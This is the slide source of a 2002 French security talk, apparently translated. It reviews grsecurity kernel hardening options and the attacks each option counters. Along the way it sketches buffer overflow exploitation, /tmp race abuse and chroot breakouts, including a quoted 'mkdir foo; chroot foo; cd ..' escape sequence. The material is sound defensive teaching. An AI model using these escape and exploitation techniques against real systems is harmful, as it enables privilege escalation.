%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% THE MIDGARD MAGICPOINT TEMPLATE %% %% Copyright(c) 1999 Henri Bergius %% %% A template for making MagicPoint presentations for %% Midgard. Originally written for MagicPoint 1.06a %% and the Midgard Workshop in October 1999. %% %% See the Midgard CVS repository for usage examples. %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %deffont "standard" tfont "arial.ttf", xfont "helvetica-medium-r" %deffont "thick" tfont "arialbd.ttf", xfont "helvetica-bold-r" %deffont "typewriter" tfont "courbd.ttf", xfont "courier-medium-r" %deffont "code" tfont "courdb.ttf", size 3, fore "green", prefix " " %% %% Default settings per each line numbers. %% %% The page settings: %%default 1 leftfill, size 2, fore "white", back "black", font "thick" %%, bimage "midgard-black-bg.jpg" 1024x768 %%default 1 area 90 90, leftfill, size 2, fore "white", back "black", font "thick", hgap 0 %%Chmurf... c'est bien joli area 90 90, mais bon là je m'en vais te le virer : et hop %%default 1 leftfill, size 2, fore "white", back "black", font "thick", hgap 0 %default 1 leftfill, size 2, fore "white", back "black", font "thick" %% %% Format the header: %default 2 size 7, vgap 10, prefix " " %% %% Have a bar: %default 3 size 2, bar "brown" 5, vgap 30, right, prefix "(c)01/2002 Denis Ducamp pour RESIST" %%, right, image "copy.png" %% %% The standard text settings: %%default 4 left, size 5, fore "white", vgap 40, prefix " ", font "standard" %%grrr... Ne pas utiliser left, mais leftfill... sinon pas d'indentation correcte :( %default 4 leftfill, size 5, fore "white", vgap 40, prefix " ", font "standard" %% %% Default settings that are applied to TAB-indented lines. 
%%
%tab 1 size 4, vgap 30, prefix " ", icon box "brown" 30, fore "white"
%tab 2 size 4, vgap 20, prefix " ", icon arc "yellow" 30, fore "grey75"
%%tab 2 size 4, vgap 20, prefix " ", icon arc "yellow" 30
%tab 3 size 3, vgap 20, prefix " ", icon delta3 "white" 40, fore "grey75"
%tab 4 size 3, vgap 20, prefix " ", icon delta3 "white" 40, fore "grey75"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%nodefault
%center, fore "white", size 8
Hardening the Linux kernel
%size 4

%center, size 7
the useful and the futile in the grsecurity patch
%size 4

%size 7
RÉSIST
%size 3
28 January 2002
%size 4

%right, size 4, fore "white"
by Denis Ducamp - HSC Toulouse
Denis.Ducamp@hsc.fr - http://www.hsc.fr/
Denis.Ducamp@groar.org - http://www.groar.org/
%left
%%image "linux-logo.png"
%%xsystem "display -geometry %327x360 linux-logo.png"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
HSC - Hervé Schauer Consultants

	a firm of 16 security consultants
		Unix
		TCP/IP networks
		Windows NT/2k/...
	an office of 2 consultants in Toulouse since November 2001
	Speaks at many conferences
		OSSIR Paris: SUR and SWNT
		and now RÉSIST in Toulouse
%cont, fore "green"
 ;-)
%fore "white"
		EFE / Linux Expo / Reed-OIP / Netsec / Infosec / etc.
	All our presentations are available on our web server
		as are many articles in the tips section, vulnerability watch reports, papers, course material, etc.
	Free software from the very beginning
		386BSD, Linux, FreeBSD, OpenBSD
		sendmail, bind, Postfix, apache, OpenSSL, OpenSSH, etc.
		author of a few original free security tools
			filterrules, nstreams, idswu, babelweb, subweb, etc.
	But also proficient with many commercial software and hardware products
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
HSC - services

	Security audits
		Penetration tests
		Source code audits
	Vulnerability watch
		Technology and strategy watch on security news
	Training
		TCP/IP risks
		Linux / Unix / Windows
		Postfix, bind, etc.
		IPSec
		Internet/Intranet
		etc.
	Architecture consulting
	etc.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Introduction

%rcutin
	The grsecurity patch
%pause
		and the others: OpenWall, PaX, etc.
%rcutin, pause
	A few notions
%pause
		chroot / set[ug]id
		buffer overflows
		/proc / predictable temporary file names / fork bombs
		logging / auditing
		ptrace() / OS fingerprinting / tpe
%rcutin, pause
	The grsecurity options
%pause
		Buffer Overflow Protection
		Access Control Lists
		Filesystem Protections
		Kernel Auditing
		Executable Protections
		Network Protections
		Sysctl support
		Miscellaneous Enhancements
%rcutin, pause
	A few concrete cases
%pause
		The server of a home user / of an e-commerce site / of the NSA
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
The grsecurity patch

	The grsecurity patch gathers a large number of Linux kernel hardening options.
	Kernel hardening means forbidding
		certain system calls in a certain number of cases
		access to certain sensitive data
	This presentation goes through each option, explaining which attacks it was written to counter and whether it is really useful.
	Home Page: http://www.grsecurity.net/
	Version tested: Jan 21 01:34 grsecurity-1.9.3a-2.4.17.patch
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
The other patches

	This patch is based on many other patches, including:
	Openwall
		http://www.openwall.com/linux/
		by Solar Designer
		available for 2.2.19/20 and 2.0.39
		part of the Openwall project, see also Owl
	PaX
		http://pageexec.virtualave.net/
		by The PaX Team
		available for 2.2.19/20 and 2.4.16
	Many others that have been ported to Linux 2.4
		e.g. Trusted Path Execution, see Phrack
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Why this patch?

	Why does it exist?
		to let administrators add a large number of options in a simple way
			all the options are contained in a single patch
			the patch is updated for every new kernel version
		to make patches written for Linux 2.0/2.2 available under Linux 2.4
	Why is it studied here?
		because it is the patch that gathers the largest number of options
		it is the opportunity to see what is useful...
	Beware: this set of patches is complex
		some patches may still be under development
			hence bugs: from denial of service... to bypasses of the protections.
		some patches may be dropped from one version to the next
			e.g. "stealth networking" can be replaced by iptables
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
A few notions

	chroot / set[ug]id
	buffer overflows
	/proc / predictable temporary file names / fork bombs
	logging / auditing
	ptrace() / OS fingerprinting / tpe
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
A few notions (1)

	chroot
		The chroot system call confines a process to a subtree of the disk, limiting the risk if the application is vulnerable
			+ The attacker's disk access is limited to that subtree
			- Jailing a process running as root is useless
				creating device files: direct disk access
				double chroot: escaping the jail
				etc.
	set[ug]id
		The setuid (setgid) system call changes the user (primary group) running the process
			+ Only a (setuid) root process can change identity
			- In some cases that process can regain root privileges
		A setuid (setgid) program runs with the privileges of its owner (owning group)
			if such a program is vulnerable, any user can obtain the owner's privileges
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
A few notions (2)

	Buffer overflows
		The programmer provided a fixed-length buffer for some data
		the user sends data that is much longer
		the program's execution is disrupted
			from denial of service...
%font "code"
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
%font "standard"
			to controlled code execution
%font "code"
Linux vaio 2.4.16 #3 Sat Dec 1 23:56:11 CET 2001 i686 unknown
uid=0(root) gid=0(root) groups=0(root)
%font "standard"
		a buffer overflow is exploited by
			sending a shellcode (executable code that starts a shell) and changing the return address of a running function to point to the shellcode sent
			changing the return address to point to a C library function
				system(), strcpy(), etc.
		the overflowed buffer may just as well be located on the stack, in the heap, etc.
			i.e. memory regions that are executable although they should only be readable / writable
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
A few notions (3)

	/proc
		virtual file system under Linux
		gives access to kernel parameters, some of which can be changed on the fly: /proc/sys
			+ provides a lot of information about all processes
			- lets one know what other users are doing
	Predictable temporary file names
		the attacker creates the file before the user does and lets the user write into it
			the file created can be a symbolic/hard link or a named pipe
			- denial of service: overwriting system files
			  privilege escalation: controlled overwriting of sensitive files
			  theft of sensitive information
	fork bombs
		running a large number of processes
		running a large number of processes per second
			- denial of service through consumption of system resources: memory and/or CPU
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
A few notions (4)

	Logging
		an application (the kernel) generates an event
		the event is sorted and recorded by a dedicated daemon: syslogd
			under Linux the klogd daemon routes kernel events to syslogd
		logging can be forwarded to another server
			useful because attackers systematically clean up their traces on the compromised system
	Auditing
		the kernel logs
		every call to certain system calls, with their parameters and/or result
			+ analysis of how the system is used
				in real time
				after the fact
			- can consume a lot of resources
				denial of service through consumption of system resources
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
A few notions (5)

	ptrace()
		This system call is used to debug processes under Unix
			+ to find out how a process works
			- to alter the execution of a running process
	OS fingerprinting
		A set of non-standard IP packets is sent to the system under analysis
		The set of replies is characteristic of each type of system
			two different versions of the same system can often be told apart
	Trusted path execution (tpe)
		Restricts execution to programs located in a trusted directory
			a directory owned by root and writable only by root
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Grsecurity
%font "code"
CONFIG_GRKERNSEC
%font "standard"

	Simply enables the selection of the main option groups
		Buffer Overflow Protection
		Access Control Lists
		Filesystem Protections
		Kernel Auditing
		Executable Protections
		Network Protections
		Sysctl support
		Miscellaneous Enhancements
%%%font "code"
%% If you say Y here, you will be able to configure many features that
%% will enhance the security of your system. It is highly recommended
%% that you say Y here and read through the help for each option so
%% you fully understand what its doing and can evaluate its usefulness
%% for your machine.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Option group 1/8
%cont, fore "green"

	Buffer Overflow Protection
	Access Control Lists
	Filesystem Protections
	Kernel Auditing
	Executable Protections
	Network Protections
	Sysctl support
	Miscellaneous Enhancements
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
OpenWall Non-executable Stack
%font "code"
CONFIG_GRKERNSEC_STACK
%font "standard"

	Makes the execution stack non-executable
		This is Solar Designer's patch ported to Linux 2.4
	Protects against code execution on the stack
		Used when exploiting vulnerabilities: stack buffer overflows / format strings
	Does not protect in the case of:
		heap buffer overflows
		returns into libc
	Code execution on the stack is used in the vast majority of vulnerability exploitations, because it is the textbook case
		so this option is very useful,
%cont, fore "red"
 but
%cont, fore "grey75"
:
			it does not remove the need to update vulnerable services
			it generally protects against the very first exploit program for each vulnerability
	Cannot be selected if "PaX protection" is selected
%%%font "code"
%% If you say Y here, your system will not allow execution of
%% code on the stack, making buffer overflow exploitation more difficult.
%% The code for this protection is taken from the Openwall patch for
%% linux 2.2 by Solar Designer. You can view his projects at
%% http://www.openwall.com/linux.
%% Exploits against your machine with this protection will have to dabble
%% in more obscure methods of exploitation(bss,got,heap..)
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Gcc trampoline support
%font "code"
CONFIG_GRKERNSEC_STACK_GCC
%font "standard"

	Enables support for trampoline jumps
		A trampoline jump is the execution of a small piece of code on the stack to speed up a program
		The patch has to tell these jumps apart from vulnerability exploitations
		The glibc 2.0 library contains several such jumps and therefore requires this option
	In theory this could allow bypassing the non-executable stack
		In practice no such case has been detected.
	Requires "OpenWall Non-executable Stack"
%cont, font "code"
 CONFIG_GRKERNSEC_STACK
%font "standard"
%%%font "code"
%% If you say Y here, the system will support trampoline code along
%% with the stack protection. If you do not have any programs on
%% your system that require this (glibc 2.0 users must say YES to
%% this option) you may say no here.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
PaX protection
%font "code"
CONFIG_GRKERNSEC_PAX
%font "standard"

	Prevents code execution in certain memory pages
		Normally on IA-32 any readable page is also executable
		This is the PaX patch
	Protects against code execution on the stack, in the heap...
		Used when exploiting vulnerabilities
	Incompatible with some programs
		those that execute code in dynamic memory regions obtained through malloc(): XFree86, JRE, Wine...
	PaX can be bypassed today
		see Nergal's article: article 4 of Phrack 58
		but it generally protects against the very first exploit program for each vulnerability
	Cannot be selected if "OpenWall Non-executable Stack" is selected
%%%font "code"
%% By design the IA-32 architecture does not allow for protecting
%% memory pages against execution, i.e. if a page is readable (such
%% as the stack or heap) it is also executable. There is a well
%% known exploit technique that makes use of this fact and a common
%% programming mistake where an attacker can introduce executable
%% code of his choice somewhere in the attacked program's memory
%% (typically the stack or the heap) and then execute it. If the
%% attacked program was running with different (typically higher)
%% privileges than that of the attacker, then he can elevate his
%% own privilege level (e.g. get a root shell, write to files for
%% which he does not have write access to, etc).
%% Since the implementation is software based, it comes with a
%% performance impact, you should evaluate your system carefully
%% before deciding to use this feature on production systems.
%% Enabling this feature will enforce the non-executable flag on
%% memory pages thereby making it harder to execute 'foreign' code
%% in a program. This will also break programs that rely on the
%% old behaviour and expect that dynamically allocated memory via
%% the malloc() family of functions is executable (which it is not).
%% Notable examples are the XFree86 4.x server, the java runtime
%% and wine.
%% NOTE: you can use the 'chpax' utility to enable/disable this
%% feature on a per file basis. chpax is available at
%% http://pageexec.virtualave.net
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Emulate trampolines
%font "code"
CONFIG_GRKERNSEC_PAX_EMUTRAMP
%font "standard"

	The PaX patch is also incompatible with trampoline jumps
		this option detects them so that their execution can be allowed
	Requires "PaX protection"
%cont, font "code"
 CONFIG_GRKERNSEC_PAX
%font "standard"
%%%font "code"
%% There are some programs and libraries that for one reason or
%% another attempt to execute special small code snippets from
%% non-executable memory pages. Most notable examples are the
%% signal handler return code generated by the kernel itself and
%% the GCC trampolines.
%% If you enabled CONFIG_GRKERNSEC_PAX then such programs will no
%% longer work under your kernel. As a remedy you can say Y here
%% and use the 'chpax' utility to enable trampoline emulation for
%% the affected programs yet still have the protection provided by
%% CONFIG_GRKERNSEC_PAX. Alternatively you can say N here and use
%% the 'chpax' utility to disable CONFIG_GRKERNSEC_PAX for the
%% affected files. chpax is available at
%% http://pageexec.virtualave.net
%% NOTE: enabling this feature *may* open up a loophole in the
%% protection provided by CONFIG_GRKERNSEC_PAX that an attacker
%% could abuse. Therefore the best solution is to not have any
%% files on your system that would require this option. This can
%% be achieved by not using libc5 (which relies on the kernel
%% signal handler return code) and not using or rewriting programs
%% that make use of the nested function implementation of GCC.
%% Skilled users can just fix GCC itself so that it implements
%% nested function calls in a way that does not interfere with PaX.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Restrict mprotect()
%font "code"
CONFIG_GRKERNSEC_PAX_MPROTECT
%font "standard"

	Prevents a process from re-enabling
		execute permission on non-executable pages
		write permission on read-only pages
	Requires "PaX protection"
%cont, font "code"
 CONFIG_GRKERNSEC_PAX
%font "standard"
%%%font "code"
%% Enabling this option will prevent programs from changing the
%% executable status of memory pages that were not originally
%% created as executable. The kernel will also prevent programs
%% from making read-only executable pages writable again.
%% You should say Y here to complete the protection provided by
%% the enforcement of the PAGE_EXEC flag (CONFIG_GRKERNSEC_PAX).
%% NOTE: you can use the 'chpax' utility to enable/disable this
%% feature on a per file basis.
%% chpax is available at
%% http://pageexec.virtualave.net
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Randomize mmap() base
%font "code"
CONFIG_GRKERNSEC_PAX_RANDMMAP
%font "standard"

	Randomizes the addresses used by programs:
		the execution stack
		the results of mmap(), hence the load address of libraries
		the address of dynamic ELF programs
	The attacker has to guess the addresses of the components to use
	Certainly does not prevent:
		format string exploitation through remote analysis of the execution stack
	Cannot be selected if "OpenWall Non-executable Stack" is selected
%%%font "code"
%% By saying Y here the kernel will somewhat randomize the address
%% space layout of programs at each execution (the top of the stack, the
%% base address for mmap() requests that do not specify one themselves
%% and the base address of dynamic ELF executables).
%% As a result all dynamically loaded libraries will appear at random
%% addresses and therefore be harder to exploit by a technique where
%% an attacker attempts to execute library code for his purposes
%% (e.g. spawn a shell from an exploited program that is running at
%% an elevated privilege level).
%% Furthermore, if a program is relinked as a dynamic ELF file, its
%% base address layout will be randomized as well, completing the full
%% randomization of the address space. Attacking such programs becomes
%% a guess game.
%% It is strongly recommended to say Y here even if CONFIG_GRKERNSEC_PAX
%% is not enabled as address space layout randomization has negligible
%% impact on performance yet it provides a very effective protection.
%% NOTE: you can use the 'chpax' utility to enable/disable this
%% feature on a per file basis.
%% chpax is available at
%% http://pageexec.virtualave.net
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Read-only kernel memory
%font "code"
CONFIG_GRKERNSEC_KMEM
%font "standard"

	Prevents root from modifying kernel memory
		Prevents the loading of kernel rootkits
	Useless unless module support is also disabled
%%%font "code"
%% If you say Y here, root will not be able to modify the contents of
%% kernel memory. If module support is removed in addition to enabling
%% this option, the ability of an attacker to insert foreign code into
%% a running kernel is removed. If the sysctl option is enabled, a
%% sysctl option with name "read_only_kmem" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Fixed mmap restrictions
%font "code"
CONFIG_GRKERNSEC_MMAPFIXED
%font "standard"

	Prevents a process from calling mmap() with a fixed address and execute permission
	Prevents a program from defeating the randomized results of mmap()
%%%font "code"
%% If you say Y here, it will be impossible for an attacker to bypass the
%% PaX buffer overflow protection by mmaping an executable memory region
%% with a specific address set. If the sysctl option is enabled, a
%% sysctl option with name "mmap_fixed_restrict" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Option group 2/8
%cont, fore "grey80"

	Buffer Overflow Protection
%cont, fore "green"
	Access Control Lists
	Filesystem Protections
	Kernel Auditing
	Executable Protections
	Network Protections
	Sysctl support
	Miscellaneous Enhancements
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Oblivion ACL System
%font "code"
CONFIG_GRKERNSEC_ACL
%font "standard"

	Enables support for the Oblivion ACL system
		This system relies on the obvadm daemon, to be fetched separately
			http://www.grsecurity.net/obvadm-1.1a.tar.gz
	Allows ACLs to be specified
		absolutely, on all files: file.acl
		relative to certain programs: proc.acl
		http://www.grsecurity.net/obvdoc.tar.gz
	A file / a directory tree can be:
		readable
		executable
		writable
		append-only
		hidden
%%%font "code"
%% If you say Y here, you enable the Access Control List system for
%% grsecurity called Oblivion. Oblivion is a very advanced ACL system
%% that is optimized for speed and correctness of ACLS. Unlike many
%% other popular ACL systems, it allows both process and file ACLs.
%% To use the ACL system, you must also download the userspace code
%% and documentation off the grsecurity website: http://grsecurity.net
%% You will then need to run obvadm setup to set your password and create
%% your config files.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Oblivion ACL System: options...

	These options are not documented...
		and require "Enable grsecurity ACL system"
%cont, font "code"
 CONFIG_GRKERNSEC_ACL
%font "standard"
	Maximum Number of Rulesets for Files, Processes
		CONFIG_GR_MAX_RULESET 256
	Seconds in between log messages(minimum)
		CONFIG_GR_FLOODTIME 3
	Default ruleset for programs without acls
		Deny CONFIG_GR_DEF_DENY
		Allow CONFIG_GR_DEF_ALLOW (default)
		Deny_if_running_as_root CONFIG_GR_DEF_DENY_ROOT
	Enable ACL Debugging Messages
		CONFIG_GR_DEBUG
	Path to gradm
		CONFIG_GRADM_PATH "/sbin/gradm"
	Maximum tries before password lockout
		CONFIG_GR_MAXTRIES 3
	Time to wait after max password tries, in seconds
		CONFIG_GR_TIMEOUT 30
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Option group 3/8
%cont, fore "grey60"

	Buffer Overflow Protection
%cont, fore "grey80"
	Access Control Lists
%cont, fore "green"
	Filesystem Protections
	Kernel Auditing
	Executable Protections
	Network Protections
	Sysctl support
	Miscellaneous Enhancements
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Proc Restrictions
%font "code"
CONFIG_GRKERNSEC_PROC
%font "standard"

	Restricts access to /proc for users
		who can then only view their own processes
		who can access neither dmesg(8) nor kernel and module symbols
	The actual restrictions depend on the options selected
	Helps maintain good confidentiality
		on systems shared by unrelated people (ISPs...)
		on very sensitive systems
%%%font "code"
%% If you say Y here, the permissions of the /proc filesystem
%% will be altered to enhance system security and privacy. Depending
%% upon the options you choose, you can either restrict users to see
%% only the processes they themselves run, or choose a group that can
%% view all processes and files normally restricted to root if you choose
%% the "restrict to user only" option. NOTE: If you're running identd as
%% a non-root user, you will have to run it as the group you specify here.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Restrict to user only
%font "code"
CONFIG_GRKERNSEC_PROC_USER
%font "standard"

	Restricts access to /proc for all non-root users
	Requires "Proc restrictions"
%cont, font "code"
 CONFIG_GRKERNSEC_PROC
%font "standard"
%%%font "code"
%% If you say Y here, non-root users will only be able to view their own
%% processes, and restricts them from viewing network-related information,
%% running dmesg(8), and viewing kernel symbol and module information.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Allow special group
%font "code"
CONFIG_GRKERNSEC_PROC_USERGROUP
%font "standard"

	Gives one group normal access to /proc
		The process's current primary group can no longer be viewed
	Requires "Proc restrictions"
%cont, font "code"
 CONFIG_GRKERNSEC_PROC
%font "standard"
	Cannot be selected if "Restrict to user only" is selected
%%%font "code"
%% If you say Y here, you will be able to select a group that will be
%% able to view all processes, network-related information, and
%% kernel and symbol information. This option is useful if you want
%% to run identd as a non-root user.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
GID for special group
%font "code"
CONFIG_GRKERNSEC_PROC_GID 1001
%font "standard"

	The group for which access to /proc is not restricted
	Requires "Allow special group"
%cont, font "code"
 CONFIG_GRKERNSEC_PROC_USERGROUP
%font "standard"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Linking restrictions
%font "code"
CONFIG_GRKERNSEC_LINK
%font "standard"

	Prevents a process from following a symbolic link, in a +t directory (such as /tmp), that belongs to another non-root user
	Effectively counters attacks that rely on predictable temporary file names
	These attacks can be of several kinds
		denial of service
			destruction of sensitive system files, e.g. /etc/shadow
		privilege escalation
			controlled modification of sensitive system files, e.g. /etc/passwd - /.rhosts
%%%font "code"
%% If you say Y here, /tmp race exploits will be prevented, since users
%% will no longer be able to follow symlinks owned by other users in
%% world-writeable +t directories (i.e. /tmp), unless the owner of the
%% symlink is the owner of the directory. users will also not be
%% able to hardlink to files they do not own. If the sysctl option is
%% enabled, a sysctl option with name "linking_restrictions" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FIFO restrictions
%font "code"
CONFIG_GRKERNSEC_FIFO
%font "standard"

	Prevents a process from following a symbolic link, in a +t directory (such as /tmp), that belongs to another non-root user
	Effectively counters attacks that rely on predictable temporary file names
	These attacks can be of several kinds
		theft of sensitive information
			e.g. obtaining information after it has been decrypted
		on-the-fly modification of data
			e.g. insertion of a backdoor into main()
%%%font "code"
%% If you say Y here, users will not be able to write to FIFOs they don't
%% own in world-writeable +t directories (i.e. /tmp), unless the owner of
%% the FIFO is the same owner of the directory it's held in. If the sysctl
%% option is enabled, a sysctl option with name "fifo_restrictions" is
%% created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Secure file descriptors
%font "code"
CONFIG_GRKERNSEC_FD
%font "standard"

	Ensures that every program has stdin, stdout and stderr open
		respectively file descriptors 0, 1 and 2 in C
		standard input and output, error output
	Effectively counters
		denial of service
			destruction of sensitive system files, e.g. /etc/shadow
		privilege escalation
			controlled modification of sensitive system files, e.g. /etc/passwd - /.rhosts
		theft of sensitive information
			e.g. /etc/shadow
%%%font "code"
%% If you say Y here, binaries will be protected from data spoofing
%% attacks (eg. making a program read /etc/shadow). The patches do this
%% by opening up /dev/null to any of the stdin, stdout, stderr file descriptors
%% for binaries that are open. If the sysctl option is enabled, a sysctl
%% option with name "secure_fds" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Chroot jail restrictions
%font "code"
CONFIG_GRKERNSEC_CHROOT
%font "standard"

	Gives access to several options restricting jailed programs
		Restricted signals
		Deny mounts
		Deny double-chroots
		Enforce chdir("/") on all chroots
		Deny (f)chmod +s
		Deny mknod
		Deny ptraces
		Restrict priority changes
	Prevents restricted processes from using certain functions that are normally of no use to them
		except to escape the jail or to attack other processes outside the jail
	Normally it is futile to restrict root processes
		Useful in the case of badly designed applications or applications of doubtful origin
%%%font "code"
%% If you say Y here, you will be able to choose several options that will
%% make breaking out of a chrooted jail much more difficult. If you
%% encounter no software incompatibilities with the following options, it
%% is recommended that you enable each one.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Restricted signals
%font "code"
CONFIG_GRKERNSEC_CHROOT_SIG
%font "standard"

	Jailed processes can only send signals to processes in the same jail
	Prevents attacks against programs that are sensitive to signal attacks
		denial of service by (randomly) killing other processes
	Requires "Chroot jail restrictions"
%cont, font "code"
 CONFIG_GRKERNSEC_CHROOT
%font "standard"
%%%font "code"
%% If you say Y here, processes inside a chroot will not be able to send
%% signals outside of the chroot. The only signals allowed are null
%% signals which perform no action, and the parent process sending
%% a certain signal to its child. If the sysctl option is enabled, a
%% sysctl option with name "chroot_restrict_sigs" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Deny mounts
%font "code"
CONFIG_GRKERNSEC_CHROOT_MOUNT
%font "standard"
	Jailed processes can neither mount nor unmount filesystems
	Prevents escaping the jail by mounting filesystems that are unreachable from inside it
	Requires "Chroot jail restrictions"
%cont, font "code"
CONFIG_GRKERNSEC_CHROOT
%font "standard"
%%%font "code"
%% If you say Y here, processes inside a chroot will not be able to
%% mount or remount filesystems. If the sysctl option is enabled, a
%% sysctl option with name "chroot_deny_mount" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Deny double-chroots
%font "code"
CONFIG_GRKERNSEC_CHROOT_DOUBLE
%font "standard"
	Jailed processes cannot chroot() a second time
	Prevents escaping the jail by a double chroot
		http://www.bpfh.net/simes/computing/chroot-break.html
	Requires "Chroot jail restrictions"
%cont, font "code"
CONFIG_GRKERNSEC_CHROOT
%font "standard"
%%%font "code"
%% If you say Y here, processes inside a chroot will not be able to chroot
%% again. This is a widely used method of breaking out of a chroot jail
%% and should not be allowed. If the sysctl option is enabled, a sysctl
%% option with name "chroot_deny_chroot" is created.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
Enforce chdir("/") on all chroots
%font "code"
CONFIG_GRKERNSEC_CHROOT_CHDIR
%font "standard"
	chroot() forces the working directory of the process to be the root of the jail
	Prevents escaping the jail via getcwd / fchdir
		without it the working directory stays outside the new root, and chdir("..") from there climbs to the real root
	Requires "Chroot jail restrictions"
%cont, font "code"
CONFIG_GRKERNSEC_CHROOT
%font "standard"
%%%font "code"
%% If you say Y here, the current working directory of all newly-chrooted
%% applications will be set to the the root directory of the chroot.
%% The man page on chroot(2) states:
%% Note that this call does not change the current working
%% directory, so that `.' can be outside the tree rooted at
%% `/'. In particular, the super-user can escape from a
%% `chroot jail' by doing `mkdir foo; chroot foo; cd ..'.
%% It is recommended that you say Y here, since it's not known to break
%% any software. If the sysctl option is enabled, a sysctl option with
%% name "chroot_enforce_chdir" is created.
